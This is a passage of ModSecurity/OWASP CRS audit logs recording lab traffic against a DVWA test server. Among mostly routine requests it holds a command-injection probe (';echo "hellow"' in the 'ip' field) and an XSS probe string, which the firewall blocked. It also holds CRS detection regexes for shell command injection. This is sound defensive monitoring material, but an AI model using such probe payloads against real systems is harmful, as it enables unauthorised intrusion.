\"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=10,PHPI=0,HTTP=0,SESS=0): Remote Command Execution: Windows Command Injection\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.153] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRc1q38AAQEAAAkZ0BoAAAAE\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.153] ModSecurity: Warning. Pattern match \"(?:;|\\\\\\\\\\\\\\\\{|\\\\\\\\\\\\\\\\||\\\\\\\\\\\\\\\\|\\\\\\\\\\\\\\\\||&|&&|\\\\\\\\\\\\\\\\n|\\\\\\\\\\\\\\\\r|\\\\\\\\\\\\\\\\$\\\\\\\\\\\\\\\\(|\\\\\\\\\\\\\\\\$\\\\\\\\\\\\\\\\(\\\\\\\\\\\\\\\\(|`|\\\\\\\\\\\\\\\\${|<\\\\\\\\\\\\\\\\(|>\\\\\\\\\\\\\\\\(|\\\\\\\\\\\\\\\\(\\\\\\\\\\\\\\\\s*\\\\\\\\\\\\\\\\))\\\\\\\\\\\\\\\\s*(?:{|\\\\\\\\\\\\\\\\s*\\\\\\\\\\\\\\\\(\\\\\\\\\\\\\\\\s*|\\\\\\\\\\\\\\\\w+=(?:[^\\\\\\\\\\\\\\\\s]*|\\\\\\\\\\\\\\\\$.*|\\\\\\\\\\\\\\\\$.*|<.*|>.*|\\\\\\\\\\\\\\\\'.*\\\\\\\\\\\\\\\\'|\\\\\\\\\".*\\\\\\\\\")\\\\\\\\\\\\\\\\s+|!\\\\\\\\\\\\\\\\s*|\\\\\\\\\\\\\\\\$)*\\\\\\\\\\\\\\\\s*(?:'|\\\\\\\\\")*(?:[\\\\\\\\\\\\\\\\?\\\\\\\\\\\\\\\\*\\\\\\\\\\\\\\\\[\\\\\\\\\\\\\\\\]\\\\\\\\\\\\\\\\(\\\\\\\\\\\\\\\\)\\\\\\\\\\\\\\\\-\\\\\\\\\\\\\\\\|+\\\\\\\\\\\\\\\\w'\\\\\\\\\"\\\\\\\\\\\\\\\\./\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\]+/)?[\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\'\\\\\\\\\"]*(?:l[\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\'\\\\\\\\\"]* ...\" at ARGS:ip. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf\"] [line \"81\"] [id \"932100\"] [rev \"4\"] [msg \"Remote Command Execution: Unix Command Injection\"] [data \"Matched Data: ;echo \\\\\\\\x22hellow found within ARGS:ip: ;echo \\\\\\\\x22hellow\\\\\\\\x22\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"8\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-shell\"] [tag \"platform-unix\"] [tag \"attack-rce\"] [tag \"OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION\"] [tag \"WASCTC/WASC-31\"] [tag \"OWASP_TOP_10/A1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRc1q38AAQEAAAkZ0BoAAAAE\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.153] ModSecurity: Warning. Pattern match \"(?i)(?:;|\\\\\\\\\\\\\\\\{|\\\\\\\\\\\\\\\\||\\\\\\\\\\\\\\\\|\\\\\\\\\\\\\\\\||&|&&|\\\\\\\\\\\\\\\\n|\\\\\\\\\\\\\\\\r|`)\\\\\\\\\\\\\\\\s*[\\\\\\\\\\\\\\\\(,@\\\\\\\\\\\\\\\\'\\\\\\\\\"\\\\\\\\\\\\\\\\s]*(?:[\\\\\\\\\\\\\\\\w'\\\\\\\\\"\\\\\\\\\\\\\\\\./]+/|[\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\'\\\\\\\\\"\\\\\\\\\\\\\\\\^]*\\\\\\\\\\\\\\\\w[\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\'\\\\\\\\\"\\\\\\\\\\\\\\\\^]*:.*\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\|[\\\\\\\\\\\\\\\\^\\\\\\\\\\\\\\\\.\\\\\\\\\\\\\\\\w '\\\\\\\\\"/\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\]*\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\)?[\\\\\\\\\"\\\\\\\\\\\\\\\\^]*(?:m[\\\\\\\\\"\\\\\\\\\\\\\\\\^]*(?:y[\\\\\\\\\"\\\\\\\\\\\\\\\\^]*s[\\\\\\\\\"\\\\\\\\\\\\\\\\^]*q[\\\\\\\\\"\\\\\\\\\\\\\\\\^]*l(?:[\\\\\\\\\"\\\\\\\\\\\\\\\\^]*(?:d[\\\\\\\\\"\\\\\\\\\\\\\\\\^]*u[\\\\\\\\\"\\\\\\\\\\\\\\\\^]*m[\\\\\\\\\"\\\\\\\\\\\\\\\\^]*p(?:[\\\\\\\\\"\\\\\\\\\\\\\\\\^]*s[\\\\\\\\\"\\\\\\\\\\\\\\\\^ ...\" at ARGS:ip. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf\"] [line \"185\"] [id \"932110\"] [rev \"4\"] [msg \"Remote Command Execution: Windows Command Injection\"] [data \"Matched Data: ;echo found within ARGS:ip: ;echo \\\\\\\\x22hellow\\\\\\\\x22\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-shell\"] [tag \"platform-windows\"] [tag \"attack-rce\"] [tag \"OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION\"] [tag \"WASCTC/WASC-31\"] [tag \"OWASP_TOP_10/A1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRc1q38AAQEAAAkZ0BoAAAAE\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.153] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRc1q38AAQEAAAkZ0BoAAAAE\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.153] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=10,PHPI=0,HTTP=0,SESS=0): Remote Command Execution: Windows Command Injection\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRc1q38AAQEAAAkZ0BoAAAAE\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":486,"p2":2438,"p3":0,"p4":0,"p5":199,"sr":64,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:35:09 --0400","transaction_id":"WRc1vX8AAQEAAAkVV40AAAAA","remote_address":"127.0.0.1","remote_port":42148,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/flare.json HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"application/json,*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://127.0.0.1/EyesOfArgus/","Connection":"keep-alive","If-Modified-Since":"Sat, 13 May 2017 16:32:22 GMT","If-None-Match":"\"1f8-54f6a5dd13646\""}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 16:35:06 GMT","ETag":"\"246-54f6a67947f4a\"","Accept-Ranges":"bytes","Content-Length":"582","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"application/json"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/flare.json\"] [unique_id \"WRc1vX8AAQEAAAkVV40AAAAA\"]"],"stopwatch":{"p1":442,"p2":1043,"p3":63,"p4":147,"p5":60,"sr":18,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:35:09 --0400","transaction_id":"WRc1vX8AAQEAAAkVV44AAAAA","remote_address":"127.0.0.1","remote_port":42148,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc1vX8AAQEAAAkVV44AAAAA\"]"],"stopwatch":{"p1":386,"p2":863,"p3":44,"p4":254,"p5":108,"sr":17,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:35:09 --0400","transaction_id":"WRc1vX8AAQEAAAkVV48AAAAA","remote_address":"127.0.0.1","remote_port":42148,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc1vX8AAQEAAAkVV48AAAAA\"]"],"stopwatch":{"p1":340,"p2":955,"p3":44,"p4":240,"p5":51,"sr":15,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:37:12 --0400","transaction_id":"WRc2OH8AAQEAAAkW4R8AAAAB","remote_address":"127.0.0.1","remote_port":42158,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/flare.json HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"application/json,*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://127.0.0.1/EyesOfArgus/","Connection":"keep-alive","If-Modified-Since":"Sat, 13 May 2017 16:35:06 GMT","If-None-Match":"\"246-54f6a67947f4a\""}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 16:37:11 GMT","ETag":"W/\"246-54f6a6f09244d\"","Accept-Ranges":"bytes","Content-Length":"582","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"application/json"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/flare.json\"] [unique_id \"WRc2OH8AAQEAAAkW4R8AAAAB\"]"],"stopwatch":{"p1":549,"p2":1260,"p3":57,"p4":146,"p5":54,"sr":17,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:37:46 --0400","transaction_id":"WRc2Wn8AAQEAAAkXs@kAAAAC","remote_address":"192.168.75.153","remote_port":39276,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/xss_s/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/exec/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1632","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.153] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_s/\"] [unique_id \"WRc2Wn8AAQEAAAkXs@kAAAAC\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":624,"p2":2604,"p3":115,"p4":704,"p5":107,"sr":27,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:37:46 --0400","transaction_id":"WRc2Wn8AAQEAAAkXs@oAAAAC","remote_address":"192.168.75.153","remote_port":39276,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/xss_s/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/exec/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1632","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.153] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_s/\"] [unique_id \"WRc2Wn8AAQEAAAkXs@oAAAAC\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":704,"p2":2487,"p3":111,"p4":516,"p5":78,"sr":30,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:38:22 --0400","transaction_id":"WRc2fn8AAQEAAAkYuFUAAAAD","remote_address":"192.168.75.153","remote_port":39278,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"POST /dvwa/vulnerabilities/xss_s/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/xss_s/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive","Content-Type":"application/x-www-form-urlencoded","Content-Length":"109"},"body":["txtName=%27%27%3B%21--%22%3CXS&mtxMessage=%27%27%3B%21--%22%3CXSS%3E%3D%26%7B%28%29%7D&btnSign=Sign+Guestbook"]},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"316","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/xss_s/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file 